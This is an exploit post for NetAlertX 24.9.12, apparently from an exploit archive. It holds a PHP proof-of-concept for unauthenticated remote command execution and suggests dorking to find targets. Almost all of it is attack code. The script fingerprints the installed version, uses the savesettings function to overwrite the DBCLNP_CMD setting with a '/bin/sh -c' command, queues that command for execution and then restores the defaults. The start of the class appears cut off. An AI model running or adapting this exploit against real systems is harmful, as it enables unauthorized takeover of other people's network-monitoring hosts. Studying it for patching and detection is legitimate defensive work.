============================================================================================================================================= | # Title : NetAlertX 24.9.12 PHP Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://netalertx.com/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] An RCE (Remote Command Execution) exploit targeting NetAlertX, where an attacker can update settings without authentication, leading to command execution on the system. [+] save code as poc.php . [+] USage : cmd => c:\www\test\php poc.php [+] SeT target = Line : 111 [+] PayLoad : target = $target; $this->port = $port; $this->waitTime = $waitTime; $this->cleanup = $cleanup; $this->baseUrl = "http://$target:$port"; } private function sendRequest($method, $uri, $data = null) { $url = "{$this->baseUrl}$uri"; $options = [ 'http' => [ 'method' => $method, 'header' => "Content-Type: application/json\r\n", 'ignore_errors' => true ] ]; if ($data) { $options['http']['content'] = json_encode($data); } return file_get_contents($url, false, stream_context_create($options)); } public function check() { echo "[*] Checking if target is vulnerable...\n"; $res = $this->sendRequest("GET", "/maintenance.php"); if (!$res) { echo "[-] Target is not reachable.\n"; return false; } preg_match('/Installed version.*?([\d.]+)/', $res, $matches); if (!$matches) { echo "[-] Failed to detect version.\n"; return false; } $version = $matches[1]; if (version_compare($version, "23.01.14", ">=") && version_compare($version, "24.9.12", "<=")) { echo "[+] Vulnerable version detected: $version\n"; return true; } echo "[-] Target is not vulnerable (Version: $version).\n"; return false; } public function exploit($cmd) { echo "[*] Exploiting target...\n"; $payload = "/bin/sh -c \"$cmd\""; $this->updateSettings($payload, "*"); echo "[*] Waiting for settings update...\n"; sleep($this->waitTime); echo "[*] Adding payload to execution queue...\n"; $this->addToExecutionQueue("run|DBCLNP"); $this->addToExecutionQueue("cron_restart_backend"); echo "[+] Payload sent successfully!\n"; } private function updateSettings($cmd, $schedule) { $data = [ 'function' => 'savesettings', 'settings' => [ ['DBCLNP', 'DBCLNP_RUN', 'string', 'schedule'], ['DBCLNP', 'DBCLNP_CMD', 'string', $cmd], ['DBCLNP', 'DBCLNP_RUN_SCHD', 'string', "$schedule * * * *"], ] ]; $res = $this->sendRequest("POST", "/php/server/util.php", $data); if (!$res) { die("[-] Failed to update settings.\n"); } echo "[+] DBCLNP_CMD updated to '$cmd'.\n"; } private function addToExecutionQueue($cmd) { $data = [ 'function' => 'addToExecutionQueue', 'action' => uniqid() . "|$cmd" ]; $res = $this->sendRequest("POST", "/php/server/util.php", $data); if (!$res) { die("[-] Failed to add payload to execution queue.\n"); } } public function cleanup() { if (!$this->cleanup) return; echo "[*] Restoring original settings...\n"; $defaultCmd = 'python3 /app/front/plugins/db_cleanup/script.py pluginskeephistory={pluginskeephistory} hourstokeepnewdevice={hourstokeepnewdevice} daystokeepevents={daystokeepevents} pholuskeepdays={pholuskeepdays}'; $this->updateSettings($defaultCmd, "*/30"); echo "[+] Cleanup completed.\n"; } } // الاستخدام $target = "192.168.1.100"; $exploit = new NetAlertXExploit($target); if ($exploit->check()) { $exploit->exploit("id"); $exploit->cleanup(); } Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================